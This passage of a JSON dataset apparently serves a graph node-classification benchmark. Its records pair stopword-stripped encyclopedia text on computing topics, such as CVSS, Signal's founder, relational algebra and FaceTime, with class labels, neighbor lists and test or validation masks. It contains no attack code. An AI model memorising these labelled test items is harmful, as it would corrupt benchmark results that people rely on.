temporal score assess severity vulnerability context way vulnerable product software deployed measure calculated subjectively typically affected parties collateral damage potential cdp metric measures potential loss impact either physical assets equipment lives financial impact upon affected organisation vulnerability exploited target distribution td metric measures proportion vulnerable systems environment three metrics assess specific security requirements confidentiality cr integrity ir availability ar allowing environmental score fine-tuned according users environment five environmental metrics used conjunction previously assessed base temporal metrics calculate environmental score produce associated environmental vector adjustedimpact min 10,10.41* 1- 1-confimpact*confreq 1-integimpact*integreq 1-availimpact*availreq adjustedtemporal temporalscore recomputed basescores impact sub-equation replaced adjustedimpact equation environmentalscore round_to_1_decimal adjustedtemporal+ 10-adjustedtemporal *collateraldamagepotential *targetdistribution aforementioned vulnerable web server used bank provide online banking services temporary fix available vendor environmental score could assessed would give environmental score 8.2 environmental vector cdp mh/td h/cr h/ir h/ar l. score within range 7.0-10.0 therefore constitutes critical vulnerability context affected bank business several vendors organizations expressed dissatisfaction cvssv2 risk based security manages open sourced vulnerability database open security foundation jointly published public letter first regarding shortcomings failures cvssv2 authors cited lack granularity several metrics results cvss vectors scores properly distinguish vulnerabilities different type risk profiles cvss scoring system also noted requiring much knowledge exact impact vulnerability oracle introduced new metric value partial+ confidentiality integrity availability fill perceived gaps description partial complete official cvss specifications address criticisms development cvss version 3 started 2012 final specification named cvss v3.0 released june 2015 addition specification document user guide examples document also released several metrics changed added removed numerical formulas updated incorporate new metrics retaining existing scoring range 0-10 textual severity ratings none 0 low 0.1-3.9 medium 4.0-6.9 high 7.0-8.9 critical 9.0-10.0 defined similar categories nvd defined cvss v2 part standard base vector new metrics user interaction ui privileges required pr added help distinguish vulnerabilities required user interaction user administrator privileges exploited previously concepts part access vector metric cvssv2 base vector also saw introduction new scope metric designed make clear vulnerabilities may exploited used attack parts system network new metrics allow base vector clearly express type vulnerability evaluated confidentiality integrity availability c metrics updated scores consisting none low high rather none partial complete cvssv2 allows flexibility determining impact vulnerability cia metrics access complexity renamed attack complexity ac make clear access privileges moved separate metric metric describes repeatable exploit vulnerability may ac high attacker requires perfect timing circumstances user interaction also separate metric may easily duplicated future attempts attack vector av saw inclusion new metric value physical p describe vulnerabilities require physical access device system perform temporal metrics essentially unchanged cvssv2 environmental metrics cvssv2 completely removed replaced essentially second base score known modified vector modified base intended reflect differences within organization company compared world whole new metrics capture importance confidentiality integrity availability specific environment added blog post september 2015 cert coordination center discussed limitations cvssv2 cvssv3.0 use scoring vulnerabilities emerging technology systems internet things minor update cvss released june 17 2019 goal cvss version 3.1 clarify improve upon existing cvss version 3.0 standard without introducing new metrics metric values allowing frictionless adoption new standard scoring providers scoring consumers alike usability prime consideration making improvements cvss standard several changes made cvss v3.1 improve clarity concepts introduced cvss v3.0 thereby improve overall ease use standard first used input industry subject-matter experts continue enhance refine cvss applicable vulnerabilities products platforms developed past 15 years beyond primary goal cvss provide deterministic repeatable way score severity vulnerability across many different constituencies allowing consumers cvss use score input larger decision matrix risk remediation mitigation specific particular environment risk tolerance updates cvss version 3.1 specification include clarification definitions explanation existing base metrics attack vector privileges required scope security requirements new standard method extending cvss called cvss extensions framework also defined allowing scoring provider include additional metrics metric groups retaining official base temporal environmental metrics additional metrics allow industry sectors privacy safety automotive healthcare etc. score factors outside core cvss standard finally cvss glossary terms expanded refined cover terms used throughout cvss version 3.1 documentation cvssv2 base score adopted primary method quantifying severity vulnerabilities wide range organisations companies including nvd plans begin scoring vulnerabilities using cvssv3.0 addition cvssv2 sometime fall 2015",
    "neighbors": [
      5636,
      1319,
      7337,
      11213,
      2446,
      11567,
      8050,
      2709,
      6423,
      1369,
      2300,
      2558,
      575
    ],
    "mask": "Test"
  },
  {
    "node_id": 4063,
    "label": 4,
    "text": "Moxie_Marlinspike:moxie marlinspike matthew rosenfeld known moxie marlinspike american entrepreneur cryptographer computer security researcher marlinspike creator signal co-founder signal foundation currently serves ceo signal messenger also co-author signal protocol encryption used signal whatsapp facebook messenger skype allo responsible largest deployment consumer end-to-end encryption marlinspike former head security team twitter author proposed ssl authentication system replacement called convergence previously maintained cloud-based wpa cracking service targeted anonymity service called googlesharing originally state georgia marlinspike moved san francisco late 1990s worked several technology companies including enterprise infrastructure software maker bea systems inc 2004 marlinspike bought derelict sailboat along three friends refurbished sailed around bahamas making documentary journey called hold fast 2010 marlinspike chief technology officer co-founder whisper systems enterprise mobile security startup company may 2010 whisper systems launched textsecure redphone applications provided end-to-end encrypted sms messaging voice calling respectively company acquired social-media firm twitter undisclosed amount late 2011 acquisition done primarily mr. marlinspike could help then-startup improve security time head cybersecurity twitter firm made whisper systems apps open source marlinspike left twitter early 2013 founded open whisper systems collaborative open source project continued development textsecure redphone time marlinspike trevor perrin started developing signal protocol early version first introduced textsecure app february 2014 november 2015 open whisper systems unified textsecure redphone applications signal 2014 2016 marlinspike worked whatsapp facebook google integrate signal protocol messaging services february 21 2018 marlinspike whatsapp co-founder brian acton announced formation signal foundation 2009 paper marlinspike introduced concept ssl stripping man-in-the-middle attack network attacker could prevent web browser upgrading ssl connection subtle way would likely go unnoticed user also announced release tool codice_1 would automatically perform types man-in-the-middle attacks http strict transport security hsts specification subsequently developed combat attacks marlinspike discovered number different vulnerabilities popular ssl implementations notably marlinspike published 2002 paper exploiting ssl/tls implementations correctly verify x.509 v3 basicconstraints extension public key certificate chains allowed anyone valid ca-signed certificate domain name create appeared valid ca-signed certificates domain vulnerable ssl/tls implementations included microsoft cryptoapi making internet explorer windows software relied ssl/tls connections vulnerable man-in-the-middle attack 2011 vulnerability discovered remained present ssl/tls implementation apple inc. ios also notably marlinspike presented 2009 paper introduced concept null-prefix attack ssl certificates revealed major ssl implementations failed properly verify common name value certificate could tricked accepting forged certificates embedding null characters cn field 2011 marlinspike presented talk titled ssl future authenticity black hat security conference las vegas outlined many current problems certificate authorities announced release software project called convergence replace certificate authorities 2012 marlinspike trevor perrin submitted internet draft tack designed provide ssl certificate pinning help solve ca problem ietf 2012 marlinspike david hulton presented research makes possible reduce security ms-chapv2 handshakes single des encryption hulton built hardware capable cracking remaining des encryption less 24 hours two made hardware available anyone use internet service marlinspike says flying within united states unable print boarding pass required airline ticketing agents make phone call order issue one subjected secondary screening tsa security checkpoints entering united states via flight dominican republic 2010 marlinspike detained federal agents nearly five hours electronic devices confiscated first agents claimed would get back provided passwords could decrypt data marlinspike refused devices eventually returned though noted could longer trust saying could modified hardware installed new keyboard firmware",
    "neighbors": [
      5636,
      4746,
      3852,
      9744,
      7722,
      2360,
      3704,
      11345,
      9690,
      10332,
      3805,
      5087,
      2147,
      2275,
      1254,
      9196,
      8045,
      2678,
      6520,
      3708,
      2558,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 4064,
    "label": 9,
    "text": "Document_Style_Semantics_and_Specification_Language:document style semantics specification language document style semantics specification language dsssl international standard developed provide stylesheets sgml documents dsssl consists two parts tree transformation process used manipulate tree structure documents prior presentation formatting process associates elements source document specific nodes target representation—the flow object tree dsssl specifications device-independent pieces information interchanged different platforms dsssl standardize back-end formatters generate language output formatters may render output on-screen display write computer file specific format postscript rich text format based subset scheme programming language specified standard iso/iec 10179:1996 developed iso/iec jtc1/sc34 iso/iec joint technical committee 1 subcommittee 34 document description processing languages sgml contains information machine-readable human-readable format stylesheet used present information stored sgml pleasing accessible way dsssl convert wide range formats including rtf html latex dsssl compatible sgml-based document type used often docbook 1997 software engineer geir ove grønmo published syntax highlighting language definition kedit appearance xml alternative sgml xml associated stylesheet language xsl also widely rapidly adopted around 1999 although dsssl continued use within shrinking sgml field xsl soon use extensively coders dsssl ever achieved emphasised previous sgml strongholds docbook converted sgml xml also converted favoured stylesheet language dsssl xsl sometime 1994 opera software began drafting dsssl lite specification consideration world wide web consortium since dsssl thought complex world wide web",
    "neighbors": [
      2432,
      9345,
      10752,
      8854,
      11036,
      5149,
      2206,
      7455,
      9245,
      5413,
      10413,
      6062,
      11056,
      8627,
      8628,
      3126,
      1079,
      5816,
      62,
      6977,
      2374,
      8904,
      1610,
      9290,
      8524,
      2519,
      119,
      2904,
      4058,
      8923,
      479,
      10083,
      7805,
      8421,
      8426,
      2030,
      5614,
      1010,
      4979,
      3447,
      124,
      2045,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 4065,
    "label": 1,
    "text": "Relational_algebra:relational algebra relational algebra first created edgar f. codd ibm family algebras well-founded semantics used modelling data stored relational databases defining queries main application relational algebra providing theoretical foundation relational databases particularly query languages databases chief among sql relational algebra received little attention outside pure mathematics publication e.f. codd relational model data 1970 codd proposed algebra basis database query languages see section implementations five primitive operators codd algebra selection projection cartesian product also called cross product cross join set union set difference relational algebra uses set union set difference cartesian product set theory adds additional constraints operators set union set difference two relations involved must union-compatible —that two relations must set attributes set intersection defined terms set union set difference two relations involved set intersection must also union-compatible cartesian product defined two relations involved must disjoint headers—that must common attribute name addition cartesian product defined differently one set theory sense tuples considered shallow purposes operation cartesian product set n -tuples set -tuples yields set flattened -tuples whereas basic set theory would prescribed set 2-tuples containing n -tuple -tuple formally r × defined follows formula_1 cardinality cartesian product product cardinalities factors r × r × projection unary operation written formula_2 formula_3 set attribute names result projection defined set obtained tuples r restricted set formula_4 note implemented sql standard default projection returns multiset instead set projection obtained addition codice_1 keyword eliminate duplicate data generalized selection unary operation written formula_5 propositional formula consists atoms allowed normal selection logical operators negation selection selects tuples r holds obtain listing friends business associates address book selection might written formula_6 result would relation containing every attribute every unique record true true rename unary operation written formula_7 result identical r except b attribute tuples renamed attribute simply used rename attribute relation relation rename 'isfriend attribute 'isbusinesscontact relation formula_8 might used natural join ⋈ binary operator written r ⋈ r relations result natural join set combinations tuples r equal common attribute names example consider tables employee dept natural join also used define composition relations example composition employee dept join shown projected common attribute deptname category theory join precisely fiber product natural join arguably one important operators since relational counterpart logical note carefully variable appears two predicates connected variable stands thing appearances must always substituted value particular natural join allows combination relations associated foreign key example example foreign key probably holds employee deptname dept deptname natural join employee dept combines employees departments works foreign key holds attributes name case foreign key dept manager employee name rename columns take natural join join sometimes also referred equijoin see θ -join formally semantics natural join defined follows fun predicate true relation mathematical sense iff function usually required r must least one common attribute constraint omitted r common attributes natural join becomes exactly cartesian product natural join simulated codd primitives follows assume c ... c attribute names common r r ... r attribute names unique r ... attribute names unique furthermore assume attribute names x ... x neither r first step rename common attribute names take cartesian product select tuples joined finally take projection get rid renamed attributes consider tables car boat list models cars boats respective prices suppose customer wants buy car boat want spend money boat car θ -join ⋈ predicate carprice ≥ boatprice produces flattened pairs rows satisfy predicate using condition attributes equal example price condition may specified price price alternatively price want combine tuples two relations combination condition simply equality shared attributes convenient general form join operator θ -join theta-join θ -join binary operator written formula_9 formula_10 b attribute names θ binary relational operator set ≤ ≠ ≥ v value constant r relations result operation consists combinations tuples r satisfy θ result θ -join defined headers r disjoint contain common attribute simulation operation fundamental operations therefore follows case operator θ equality operator join also called equijoin note however computer language supports natural join selection operators need θ -join well achieved selection result natural join degenerates cartesian product shared attributes sql implementations joining predicate usually called inner join keyword allows one specify predicate used filter rows important note forming flattened cartesian product filtering rows conceptually correct implementation would use sophisticated data structures speed join query left semijoin joining similar natural join written r ⋉ r relations result set tuples r tuple equal common attribute names difference natural join columns appear example consider tables employee dept semijoin formally semantics semijoin defined follows fun r definition natural join semijoin simulated using natural join follows ... attribute names r since simulate natural join basic operators follows also holds semijoin codd 1970 paper semijoin called restriction antijoin written r ▷ r relations similar semijoin result antijoin tuples r tuple equal common attribute names example consider tables employee dept antijoin antijoin formally defined follows fun ∪ definition natural join antijoin also defined complement semijoin follows given antijoin sometimes called anti-semijoin antijoin operator sometimes written semijoin symbol bar instead ▷ division binary operation written r ÷ division implemented directly sql result consists restrictions tuples r attribute names unique r i.e. header r header holds combinations tuples present r example see tables completed dbproject division dbproject contains tasks database project result division contains exactly students completed tasks database project formally semantics division defined follows ... set attribute names unique r ... restriction set usually required attribute names header subset r otherwise result operation always empty simulation division basic operations follows assume ... attribute names unique r b ... b attribute names first step project r unique attribute names construct combinations tuples prior example would represent table every student student unique key attribute completed table combined every given task eugene instance would two rows eugene → database1 eugene → database2 t. relation u possible combinations could r n't restrictions tuples r combinations tuples present r remains done take projection r unique attribute names subtract v practice classical relational algebra described extended various operations outer joins aggregate functions even transitive closure whereas result join inner join consists tuples formed combining matching tuples two operands outer join contains tuples additionally tuples formed extending unmatched tuple one operands fill values attributes operand outer joins considered part classical relational algebra discussed far operators defined section assume existence null value ω define used fill values practice corresponds null sql order make subsequent selection operations resulting table meaningful semantic meaning needs assigned nulls codd approach propositional logic used selection extended three-valued logic although elide details article three outer join operators defined left outer join right outer join full outer join word outer sometimes omitted left outer join written r ⟕ r relations result left outer join set combinations tuples r equal common attribute names addition loosely speaking tuples r matching tuples example consider tables employee dept left outer join resulting relation tuples common values common attribute names tuples r take null value ω since tuples dept deptname finance executive ω occur resulting relation tuples employee deptname finance executive let r r ... r attributes relation r let ω ... ω singleton relation attributes unique relation attributes r left outer join described terms natural join hence using basic operators follows right outer join behaves almost identically left outer join roles tables switched right outer join relations r written r ⟖ result right outer join set combinations tuples r equal common attribute names addition tuples matching tuples r example consider tables employee dept right outer join resulting relation tuples r common values common attribute names tuples take null value ω since tuples employee deptname production ω occur name empid attributes resulting relation tuples dept deptname production let ... attributes relation let ω ... ω singleton relation attributes unique relation r attributes left outer join right outer join simulated using natural join follows ⟗the outer join full outer join effect combines results left right outer joins full outer join written r ⟗ r relations result full outer join set combinations tuples r equal common attribute names addition tuples matching tuples r tuples r matching tuples common attribute names example consider tables employee dept full outer join resulting relation tuples r common values common attribute names tuples take null value ω tuples common values common attribute names tuples r also take null value ω full outer join simulated using left right outer joins hence natural join set union follows nothing relational algebra introduced far would allow computations data domains evaluation propositional expressions involving equality example possible using algebra introduced far write expression would multiply numbers two columns e.g unit price quantity obtain total price practical query languages facilities e.g sql select allows arithmetic operations define new columns result similar facility provided explicitly tutorial codice_2 keyword database theory called extended projection furthermore computing various functions column like summing elements also possible using relational algebra introduced far five aggregate functions included relational database systems operations sum count average maximum minimum relational algebra aggregation operation schema ... written follows 1 ≤ j ≤ k one original attributes 1 ≤ ≤ n attributes preceding g grouping attributes function like group clause sql arbitrary number aggregation functions applied individual attributes operation applied arbitrary relation r grouping attributes optional supplied aggregation functions applied across entire relation operation applied let assume table named three columns namely wish find maximum balance branch accomplished g find highest balance accounts regardless branch could simply write g although relational algebra seems powerful enough practical purposes simple natural operators relations expressed relational algebra one transitive closure binary relation given domain let binary relation r subset × transitive closure r r smallest subset × contains r satisfies following condition relational algebra expression e r taking r variable argument produces r proved using fact given relational expression e claimed e r r r variable always find instance r r corresponding domain e r ≠ r. sql however officially supports fixpoint queries since 1999 vendor-specific extensions direction well queries represented tree primary goal transform expression trees equivalent expression trees average size relations yielded subexpressions tree smaller optimization secondary goal try form common subexpressions within single query one query evaluated time queries rationale behind second goal enough compute common subexpressions results used queries contain subexpression present set rules used transformations rules selection operators play important role query optimization selection operator effectively decreases number rows operand manage move selections expression tree towards leaves internal relations yielded subexpressions likely shrink selection idempotent multiple applications selection additional effect beyond first one commutative order selections applied effect eventual result selection whose condition conjunction simpler conditions equivalent sequence selections individual conditions selection whose condition disjunction equivalent union selections identities used merge selections fewer selections need evaluated split component selections may moved optimized separately cross product costliest operator evaluate input relations n rows result contain formula_19 rows therefore important best decrease size operands applying cross product operator effectively done cross product followed selection operator e.g formula_20 considering definition join likely case cross product followed selection operator try push selection higher levels expression tree using selection rules case break condition conditions b c using split rules complex selection conditions formula_21 b contains attributes r c contains attributes p contains part contains attributes r p note b c possibly empty following holds selection distributive set difference intersection union operators following three rules used push selection set operations expression tree set difference intersection operators possible apply selection operator one operands following transformation beneficial one operands small overhead evaluating selection operator outweighs benefits using smaller relation operand selection commutes projection fields referenced selection condition subset fields projection performing selection projection may useful operand cross product join cases selection condition relatively expensive compute moving selection outside projection may reduce number tuples must tested since projection may produce fewer tuples due elimination duplicates resulting omitted fields projection idempotent series valid projections equivalent outermost projection projection distributive set union projection distribute intersection set difference counterexamples given b assumed distinct successive renames variable collapsed single rename rename operations variables common arbitrarily reordered respect one another exploited make successive renames adjacent collapsed rename distributive set difference union intersection cartesian product distributive union first query language based codd algebra alpha developed dr. codd subsequently isbl created pioneering work acclaimed many authorities shown way make codd idea useful language business system 12 short-lived industry-strength relational dbms followed isbl example 1998 chris date hugh darwen proposed language called tutorial intended use teaching relational database theory query language also draws isbl ideas rel implementation tutorial d. even query language sql loosely based relational algebra though operands sql tables exactly relations several useful theorems relational algebra hold sql counterpart arguably detriment optimisers and/or users sql table model bag multiset rather set example expression formula_39 theorem relational algebra sets relational algebra bags treatment relational algebra bags see chapter 5 complete textbook garcia-molina ullman widom practically academic textbook databases detailed treatment classic relational algebra",
    "neighbors": [
      10632,
      8201,
      8979,
      2068,
      10389,
      7446,
      11030,
      2456,
      1049,
      5658,
      5403,
      2972,
      9112,
      7582,
      4255,
      9248,
      9631,
      9634,
      11327,
      1447,
      2344,
      4263,
      7080,
      10793,
      10413,
      10286,
      9397,
      4281,
      10137,
      3004,
      1341,
      7868,
      11324,
      10048,
      2369,
      5953,
      6850,
      9411,
      6085,
      2246,
      9286,
      2632,
      9290,
      8788,
      2901,
      10069,
      7767,
      10326,
      987,
      2780,
      734,
      4066,
      8291,
      3556,
      9828,
      10340,
      10471,
      8808,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      7412,
      7159,
      1146,
      3196
    ],
    "mask": "None"
  },
  {
    "node_id": 4066,
    "label": 1,
    "text": "Tuple_relational_calculus:tuple relational calculus tuple calculus calculus created introduced edgar f. codd part relational model order provide declarative database-query language data manipulation data model formed inspiration database-query languages quel sql latter although far less faithful original relational model calculus de facto standard database-query language dialect used nearly every relational-database-management system michel lacroix alain pirotte proposed domain calculus closer first-order logic together codd showed calculi well relational algebra equivalent expressive power subsequently query languages relational model called relationally complete could express least queries since calculus query language relational databases first define relational database basic relational building block domain somewhat similar equal data type tuple finite sequence attributes ordered pairs domains values relation set ordered pairs domains names relation serves header relation relation set compatible tuples although relational concepts mathematically defined definitions map loosely traditional database concepts table accepted visual representation relation tuple similar concept row first assume existence set c column names examples name author address etcetera define headers finite subsets c relational database schema defined tuple r h domain atomic values see relational model notions domain atomic value r finite set relation names function associates header relation name r note simplification full relational model one domain header set column names also maps column names domain given domain define tuple partial function maps column names atomic value example would name harry age 25 set tuples denoted subset c tuple defined called domain confused domain schema denoted dom finally define relational database given schema r h function maps relation names r finite subsets every relation name r r tuple db r holds latter requirement simply says tuples relation contain column names namely defined schema construction formulas assume infinite set v tuple variables formulas defined given database schema r h partial function type v ⇸ 2 called type assignment assigns headers tuple variables define set atomic formulas type following rules examples atoms formal semantics atoms defined given database db tuple variable binding val v → maps tuple variables tuples domain atoms combined formulas usual first-order logic logical operators ∧ ∨ ¬ use existential quantifier ∃ universal quantifier ∀ bind variables define set formulas f type inductively following rules examples formulas note last formula states books written c. j date subject relational model usual omit brackets causes ambiguity semantics formula assume quantifiers quantify universe tuples domain schema leads following formal semantics formulas given database db tuple variable binding val v finally define query expression looks like given schema r h v tuple variable h header f v formula f type type v h v free variable result query given database db set tuples dom h f true db val v examples query expressions semantics quantifiers quantify tuples domain schema query may return different result certain database another schema presumed example consider two schemas r h r h domains 1 1 2 relation names r r headers h r schemas common instance consider following query expression result db either 1 1 2 also clear take domain infinite set result query also infinite solve problems restrict attention queries domain independent i.e. queries return result database schemas interesting property queries assume tuple variables range tuples so-called active domain database subset domain occurs least one tuple database query expression semantics query expressions change fact many definitions tuple calculus semantics quantifiers defined makes queries definition domain independent order limit query expressions express domain-independent queries syntactical notion safe query usually introduced determine whether query expression safe derive two types information query first whether variable-column pair bound column relation constant second whether two variable-column pairs directly indirectly equated denoted v == w deriving boundedness introduce following reasoning rules deriving equatedness introduce following reasoning rules next usual reasoning rules equivalence relations reflexivity symmetry transitivity say query expression v h f v safe restriction safe query expressions limit expressiveness since domain-independent queries could expressed also expressed safe query expression proven showing schema r h given set k constants query expression tuple variable v header h construct safe formula every pair v h states value active domain example assume k 1,2 r r h r b corresponding safe formula v .b formula used rewrite unsafe query expression equivalent safe query expression adding formula every variable v column name type used expression effectively means let variables range active domain already explained change semantics expressed query domain independent",
    "neighbors": [
      4065,
      10145,
      9286,
      4263,
      10413,
      10737,
      9075,
      2901,
      9397,
      2972,
      7582,
      11327
    ],
    "mask": "Test"
  },
  {
    "node_id": 4067,
    "label": 4,
    "text": "Trusted_Computer_System_Evaluation_Criteria:trusted computer system evaluation criteria trusted computer system evaluation criteria tcsec united states government department defense dod standard sets basic requirements assessing effectiveness computer security controls built computer system tcsec used evaluate classify select computer systems considered processing storage retrieval sensitive classified information tcsec frequently referred orange book centerpiece dod rainbow series publications initially issued 1983 national computer security center ncsc arm national security agency updated 1985 tcsec eventually replaced common criteria international standard originally published 2005 24 october 2002 orange book aka dodd 5200.28-std canceled dodd 8500.1 later reissued dodi 8500.02 14 march 2014 security policy must explicit well-defined enforced computer system three basic security policies specified individual accountability regardless policy must enforced secure means must exist ensure access authorized competent agent evaluate accountability information within reasonable amount time without undue difficulty accountability objective includes three requirements computer system must contain hardware/software mechanisms independently evaluated provide sufficient assurance system enforces requirements extension assurance must include guarantee trusted portion system works intended accomplish objectives two types assurance needed respective elements within class additional set documentation addresses development deployment management system rather capabilities documentation includes tcsec defines four divisions c b division highest security division represents significant difference trust individual organization place evaluated system additionally divisions c b broken series hierarchical subdivisions called classes c1 c2 b1 b2 b3 a1 division class expands modifies indicated requirements immediately prior division class publication entitled army regulation 380-19 example guide determining system class used given situation",
    "neighbors": [
      6787,
      4988,
      10378,
      5136,
      11281,
      6675,
      1304,
      3616,
      3241,
      2477,
      9646,
      7983,
      1585,
      1458,
      2737,
      2995,
      4914,
      10933,
      7354,
      10170,
      8637,
      1350,
      8904,
      1225,
      4303,
      7887,
      10835,
      3924,
      10580,
      9817,
      3930,
      10467,
      11496,
      3178,
      8302,
      3827,
      6772,
      9846,
      636,
      2558,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 4068,
    "label": 2,
    "text": "FaceTime:facetime facetime proprietary videotelephony product developed apple inc. facetime available supported ios mobile devices macintosh computers run later facetime supports ios device forward-facing camera macintosh computer equipped facetime camera facetime audio audio-only version available ios device supports ios 7 newer macintosh forward-facing camera running later facetime included free ios macos 10.7 onwards apple bought facetime name facetime communications changed name actiance inc. june 7 2010 apple announced facetime conjunction iphone 4 apple bought facetime name facetime communications changed name actiance january 2011 june 7 2010 apple announced facetime conjunction iphone 4 support fourth generation ipod touch first model ipod touch equipped cameras announced conjunction device release september 8 2010 facetime announced october 20 2010 march 2 2011 facetime support announced newly introduced ipad 2 forward- rear-facing cameras february 24 2011 facetime left beta listed mac app store us 0.99 apple claims intended provide application free charge however provision sarbanes–oxley act 2002 bars companies providing unadvertised new feature already-sold product without enduring onerous accounting measures us 0.99 beta still available download apple facetime included free macos 10.7 onwards ios allowed customers use facetime long tiered blocked application working customers unlimited data plans brought federal communications commission fcc net neutrality violations may 2011 found facetime would work seamlessly 3g iphone ipad ipod touch models supported even though facetime worked 3g time supports 4g lte calls networks world availability limited operators gsm plans june 2018 apple announced facetime would support group video audio calls 32 people ios 12 macos mojave facetime works establishing connection two supported devices apple devices iphones ipads macs introduced 2011 support facetime facetime currently incompatible non-apple devices video calling services mac models introduced 2011 high-definition video facetime devices use automatically ends facetime hd camera unlike mac os x ichat facetime currently support group conferencing support announced ios 12 application one-on-one video chat—only two people talk second user calls user answers video chat previous user ends new video session begins second caller iphone phone call pending user attempts answer video call ends phone call begins next user incoming notifications ios devices shown facetime call opened video temporarily paused user back facetime app iphone user activate facetime phone call pressing facetime button initiated facetime call history contacts application ios 7 newer also provide separate facetime app always apple non-telephony devices ipad ipod touch mac release ios 6 facetime required wifi connection work ios 6 onwards facetime iphone ipad supported facetime calls cellular networks 3g lte provided carrier enabled mid-2013 virtually carriers worldwide allowed facetime audio uses three megabytes data every five minutes conversation facetime video using significantly cellular talk time/minutes used switching voice call facetime call facetime calls placed supported devices phone number email address registered facetime service single email address registered multiple devices call placed address rings devices simultaneously facetime protocol based numerous open industry standards although interoperable videotelephony systems upon launch iphone 4 jobs stated apple would immediately start working standards bodies make facetime protocol open industry standard protocols open standards apple facetime service requires client-side certificate facetime calls protected end-to-end encryption sender receiver access apple decrypt data compared sip implementations facetime adds techniques enhance performance cost breaking interoperability port multiplexing sdp minimization sdp compression new audio-only version facetime named facetime audio announced annual apple worldwide developers conference wwdc keynote speech june 10 2013 released ios 7 september 18 2013 audio-only version facetime effectively makes protocol voice internet protocol voip competes mainstream providers field including skype microsoft based aac-ld audio protocol service provides high-quality audio ios 7 betas limited facetime audio calls placed wi-fi network original limitation video version facetime final release removed restriction allow work 3g lte data connections case carriers plans regard facetime video like video version facetime audio currently available apple devices feature available run ipod touch 4th generation device support ios 7 later facetime streaming cellular data unavailable iphone 4 ipad 2. facetime enabled devices bought united arab emirates possibly due regulations country restrict ip-based communications addition devices bought china facetime audio disabled facetime video available devices bought outside countries support video audio versions facetime although egypt jordan qatar kuwait originally disabled facetime iphone 4 later re-enabled feature carrier update existing phone owners made pre-enabled newly purchased iphone march 2018 facetime available iphones saudi arabia upon updating ios 11.3 august 2019 facetime available iphones pakistan upon updating ios 12.4 april 16 2014 facetime ceased working earlier versions ios previously supported ios 4 5 6 client-side certificate used authenticate genuine apple device facetime servers amongst uses expired date apple chose release update certificate devices newer major ios version new valid certificate available apple release minor update certificate os x versions could run facetime also earlier versions ios small number devices could run facetime could run newer major version ios 4th generation ipod touch result policy almost ios users update ios version devices wished continue using facetime limitation applied even users jailbroken devices since even legally jailbroken device would difficult also illegal extract install apple new certificate without apple permission order work around issue due proprietary nature facetime currently unavailable platforms including android windows january 28 2019 bug discovered facetime app allowed users eavesdrop users without knowledge exploit later discovered video feed could enabled without users acceptance apple said statement would release fix exploit shortly disabling group facetime time bug named facepalm security researchers affects ios devices running facetime ios 12.1 later macintosh computers running macos 10.14.1 mojave later although bug gained international attention january 28 2019 bug found 14-year old high school student arizona mother tried week warn apple problem facebook twitter discovering bug january 20th however pair found impossible reach anyone company short smoke signals trying every method someone could use get hold someone apple said ms. thompson january 25 2019 posted video youtube demonstrating bug news bug finally gained media coverage ms thompson wrote letters emails tweets msgs sent apple 10+ days reporting group facetime bug lets someone listen teenager discovered never heard back ”",
    "neighbors": [
      10242,
      10755,
      9732,
      4615,
      2057,
      1036,
      1549,
      5647,
      7697,
      1042,
      11289,
      3610,
      10271,
      3105,
      6186,
      4139,
      6700,
      7723,
      7214,
      4657,
      1074,
      8754,
      8758,
      9784,
      1083,
      8253,
      576,
      6208,
      9802,
      8783,
      5713,
      4180,
      3670,
      1623,
      3672,
      4184,
      10838,
      2141,
      4702,
      3168,
      3681,
      9826,
      2149,
      5733,
      8806,
      3691,
      8303,
      2673,
      6771,
      2676,
      119,
      6264,
      7292,
      2686,
      6783,
      7806,
      9343,
      10878,
      5251,
      3719,
      10888,
      4746,
      8842,
      11402,
      11408,
      8852,
      1686,
      7318,
      5784,
      1177,
      4251,
      3228,
      2207,
      1699,
      9381,
      11430,
      171,
      5292,
      8877,
      1710,
      2735,
      3248,
      7857,
      3766,
      2232,
      9912,
      4283,
      3772,
      7869,
      9406,
      1729,
      1218,
      6849,
      6855,
      2760,
      713,
      1738,
      9418,
      3790,
      7378,
      3284,
      3286,
      9430,
      3289,
      3293,
      4318,
      3812,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      2288,
      2802,
      7928,
      8441,
      7420,
      7422,
      11521,
      2819,
      1796,
      5382,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      11037,
      8998,
      9511,
      10023,
      811,
      3371,
      4399,
      7983,
      9519,
      10036,
      7991,
      9529,
      2363,
      2365,
      2366,
      9022,
      1346,
      7490,
      10562,
      4933,
      838,
      6982,
      7496,
      9035,
      2892,
      6993,
      2388,
      1878,
      4957,
      6495,
      9572,
      9063,
      4457,
      10602,
      3948,
      11116,
      11629,
      10608,
      3959,
      3460,
      2439,
      6023,
      6539,
      7052,
      9100,
      1428,
      9109,
      2458,
      3483,
      1439,
      2979,
      9123,
      11173,
      10153,
      1962,
      8109,
      1969,
      2994,
      1467,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      6093,
      7118,
      464,
      6608,
      8662,
      9174,
      3035,
      4571,
      7133,
      9182,
      6628,
      5093,
      487,
      2023,
      8170,
      10221,
      7154,
      5619,
      4084,
      11257,
      7163,
      10748,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 4069,
    "label": 9,
    "text": "Comparison_of_programming_languages_by_type_system:comparison programming languages type system onlyinclude comparison programming languages type system compares features type systems type checking multiple programming languages brief definitions /onlyinclude",
    "neighbors": [
      10752,
      2062,
      6160,
      9245,
      5165,
      5677,
      6718,
      8262,
      1610,
      1611,
      9804,
      7274,
      2670,
      623,
      6775,
      3705,
      7292,
      3736,
      155,
      7326,
      5796,
      4777,
      7341,
      5806,
      692,
      3765,
      8397,
      7889,
      2774,
      7894,
      5336,
      8421,
      10470,
      9454,
      4341,
      6910,
      6414,
      10510,
      11555,
      3876,
      303,
      9008,
      7479,
      10043,
      3904,
      10568,
      5961,
      8524,
      847,
      10586,
      11610,
      10083,
      8554,
      10097,
      3442,
      9078,
      3960,
      3462,
      8582,
      1931,
      5521,
      8082,
      1435,
      4507,
      6558,
      7076,
      5031,
      428,
      10680,
      6074,
      10684,
      963,
      8644,
      11212,
      11219,
      5588,
      10198,
      2519,
      4057,
      4572,
      3051,
      6640,
      1016,
      3577,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4070,
    "label": 0,
